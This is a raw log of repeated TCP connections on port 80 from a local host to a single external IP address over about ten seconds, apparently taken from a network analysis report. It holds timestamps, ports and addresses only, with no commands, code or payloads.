                                                        Feb 6, 2023 14:18:08.567075968 CET4998980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.676945925 CET4998980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.678751945 CET4999080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.736717939 CET804998962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.736896992 CET4998980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.739363909 CET804999062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.739973068 CET4999080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.739973068 CET4999080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.800668955 CET804999062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.803266048 CET804999062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.804981947 CET4999080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.914849043 CET4999080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.915537119 CET4999180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.975545883 CET804999062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.975769043 CET4999080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.975836992 CET804999162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.975951910 CET4999180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.977328062 CET4999180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.037870884 CET804999162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.042072058 CET804999162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.042259932 CET4999180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.146267891 CET4999180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.147274017 CET4999280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.206826925 CET804999162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.206914902 CET4999180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.209474087 CET804999262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.209619045 CET4999280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.210071087 CET4999280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.272217989 CET804999262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.275585890 CET804999262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.275667906 CET4999280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.384912014 CET4999280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.385641098 CET4999380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.446121931 CET804999362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.446342945 CET4999380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.446811914 CET4999380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.447438002 CET804999262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.447587013 CET4999280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.507378101 CET804999362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.510627985 CET804999362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.510756969 CET4999380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.616246939 CET4999380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.616945028 CET4999480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.676888943 CET804999362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.676979065 CET4999380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.677293062 CET804999462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.677392006 CET4999480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.678155899 CET4999480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.738662004 CET804999462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.741938114 CET804999462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.742177963 CET4999480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.865828037 CET4999480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.866724968 CET4999580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.927052021 CET804999462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.927150011 CET4999480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.928860903 CET804999562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.928973913 CET4999580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.929475069 CET4999580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:09.991794109 CET804999562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.995454073 CET804999562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:09.995534897 CET4999580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.099956989 CET4999580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.100810051 CET4999680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.161537886 CET804999662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.161653996 CET4999680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.162120104 CET4999680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.162245989 CET804999562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.162338018 CET4999580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.222527027 CET804999662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.226402044 CET804999662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.226566076 CET4999680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.337090015 CET4999680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.337886095 CET4999780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.397752047 CET804999662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.397856951 CET4999680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.399492025 CET804999762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.399619102 CET4999780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.399966002 CET4999780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.461442947 CET804999762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.464658976 CET804999762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.464840889 CET4999780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.567910910 CET4999780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.569057941 CET4999880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.629376888 CET804999862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.629496098 CET4999880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.629659891 CET804999762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.629722118 CET4999780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.629964113 CET4999880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.690006018 CET804999862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.693331003 CET804999862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.693417072 CET4999880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.832285881 CET4999880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.892649889 CET804999862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:10.894233942 CET4999880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:10.995548964 CET4999980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.056406021 CET804999962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:11.059344053 CET4999980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.060496092 CET4999980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.121162891 CET804999962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:11.126276970 CET804999962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:11.132317066 CET4999980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.270375013 CET4999980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.271100044 CET5000080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.331254005 CET804999962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:11.331785917 CET4999980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.332339048 CET805000062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:11.332542896 CET5000080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.377142906 CET5000080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.438463926 CET805000062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:11.442153931 CET805000062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:11.443485022 CET5000080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.618204117 CET5000180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.618413925 CET5000080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.679670095 CET805000162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:11.679708004 CET805000062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:11.679888964 CET5000080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.680197954 CET5000180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.711180925 CET5000180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:11.772582054 CET805000162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:11.775501966 CET805000162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:11.775686979 CET5000180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:12.316467047 CET5000180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:12.316562891 CET5000280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:12.378842115 CET805000262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:12.379051924 CET5000280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:12.380561113 CET805000162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:12.380675077 CET5000180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:12.405675888 CET5000280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:12.466837883 CET805000262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:12.469245911 CET805000262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:12.469433069 CET5000280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:12.641479015 CET5000380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:12.641498089 CET5000280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:12.701391935 CET805000262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:12.701586962 CET5000280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:12.703475952 CET805000362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:12.703681946 CET5000380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:13.453553915 CET5000380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:13.515680075 CET805000362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:13.520159006 CET805000362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:13.520270109 CET5000380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:13.840450048 CET5000380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:13.841193914 CET5000480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:13.902354002 CET805000362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:13.902523994 CET5000380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:13.903490067 CET805000462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:13.903630018 CET5000480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:13.908823967 CET5000480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:13.971352100 CET805000462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:13.973970890 CET805000462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:13.974154949 CET5000480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.187803984 CET5000480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.188520908 CET5000580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.250403881 CET805000462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.250590086 CET5000480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.250760078 CET805000562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.250859976 CET5000580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.255721092 CET5000580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.318154097 CET805000562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.322971106 CET805000562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.323072910 CET5000580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.427438974 CET5000580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.428118944 CET5000680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.489384890 CET805000662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.489510059 CET5000680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.489864111 CET5000680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.489886999 CET805000562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.490125895 CET5000580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.551090956 CET805000662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.553904057 CET805000662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.554939985 CET5000680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.671020985 CET5000680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.671740055 CET5000780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.732414961 CET805000762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.732466936 CET805000662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.732631922 CET5000680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.733104944 CET5000780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.733546972 CET5000780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.793997049 CET805000762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.796650887 CET805000762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.796830893 CET5000780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.915781975 CET5000780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.916501999 CET5000880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.976613998 CET805000762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.976703882 CET5000780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.976907969 CET805000862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:14.977129936 CET5000880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:14.977536917 CET5000880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.037914991 CET805000862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.043209076 CET805000862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.047271013 CET5000880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.161905050 CET5000880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.162852049 CET5000980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.222718954 CET805000862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.223608017 CET5000880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.225066900 CET805000962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.225166082 CET5000980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.225596905 CET5000980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.287758112 CET805000962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.291661024 CET805000962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.294775009 CET5000980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.412192106 CET5000980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.413106918 CET5001080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.474636078 CET805000962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.474766016 CET5000980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.474807978 CET805001062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.474909067 CET5001080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.475260019 CET5001080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.536814928 CET805001062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.539522886 CET805001062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.539633036 CET5001080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.646476984 CET5001080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.647434950 CET5001180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.708337069 CET805001062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.708534002 CET5001080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.710012913 CET805001162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.710206032 CET5001180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.710647106 CET5001180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.773230076 CET805001162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.775943995 CET805001162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.776118994 CET5001180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.891942978 CET5001280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.891964912 CET5001180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.954529047 CET805001262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.954579115 CET805001162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:15.954771996 CET5001180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.955152988 CET5001280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:15.955152988 CET5001280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.021119118 CET805001262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.023773909 CET805001262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.023953915 CET5001280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.130477905 CET5001280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.131135941 CET5001380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.192502975 CET805001362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.192778111 CET5001380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.192852974 CET805001262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.192949057 CET5001280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.193100929 CET5001380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.254249096 CET805001362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.259099960 CET805001362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.259320974 CET5001380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.367098093 CET5001380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.368237972 CET5001480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.428565979 CET805001362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.428603888 CET805001462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.428793907 CET5001380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.428857088 CET5001480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.436543941 CET5001480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.505155087 CET805001462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.505187035 CET805001462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.505317926 CET5001480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.639978886 CET5001480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.640760899 CET5001580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.700695992 CET805001462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.700942039 CET5001480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.703176022 CET805001562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.703414917 CET5001580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.703906059 CET5001580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.766392946 CET805001562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.769123077 CET805001562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.769337893 CET5001580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.880707026 CET5001580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.881511927 CET5001680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.942862034 CET805001662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.943099022 CET805001562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:16.943193913 CET5001680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.943660975 CET5001580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:16.944190979 CET5001680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.005361080 CET805001662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.008083105 CET805001662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.008179903 CET5001680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.115284920 CET5001680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.116300106 CET5001780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.176652908 CET805001662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.176743984 CET5001680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.178844929 CET805001762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.178972960 CET5001780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.179297924 CET5001780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.241650105 CET805001762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.245771885 CET805001762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.245939016 CET5001780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.350186110 CET5001780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.351495028 CET5001880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.412918091 CET805001762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.412986994 CET805001862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.413012981 CET5001780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.413062096 CET5001880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.421895981 CET5001880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.483552933 CET805001862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.487003088 CET805001862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.487091064 CET5001880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.599509954 CET5001880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.600202084 CET5001980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.662024975 CET805001862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.662158012 CET5001880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.662375927 CET805001962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.662498951 CET5001980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.663562059 CET5001980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.725132942 CET805001962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.728158951 CET805001962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.728257895 CET5001980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.836661100 CET5001980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.837583065 CET5002080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.900034904 CET805001962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.900172949 CET5001980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.900985956 CET805002062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.901107073 CET5002080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.901531935 CET5002080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:17.965764046 CET805002062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.965811014 CET805002062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:17.965944052 CET5002080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.071585894 CET5002080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.072381020 CET5002180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.133174896 CET805002062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.133304119 CET5002080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.133620024 CET805002162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.133758068 CET5002180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.134392977 CET5002180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.195574999 CET805002162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.199697971 CET805002162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.199923992 CET5002180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.302653074 CET5002180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.306195021 CET5002280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.364448071 CET805002162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.364674091 CET5002180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.366915941 CET805002262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.367113113 CET5002280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.367475033 CET5002280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.427970886 CET805002262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.430800915 CET805002262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.430972099 CET5002280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.539606094 CET5002280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.540294886 CET5002380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.600390911 CET805002262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.601768017 CET805002362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.601939917 CET5002280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.601996899 CET5002380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.602365017 CET5002380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.663913012 CET805002362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.666377068 CET805002362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.666522980 CET5002380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.775213003 CET5002380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.775971889 CET5002480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.835436106 CET805002462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.836987019 CET5002480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.837006092 CET805002362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.837099075 CET5002380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:18.856589079 CET5002480192.168.2.562.204.41.4
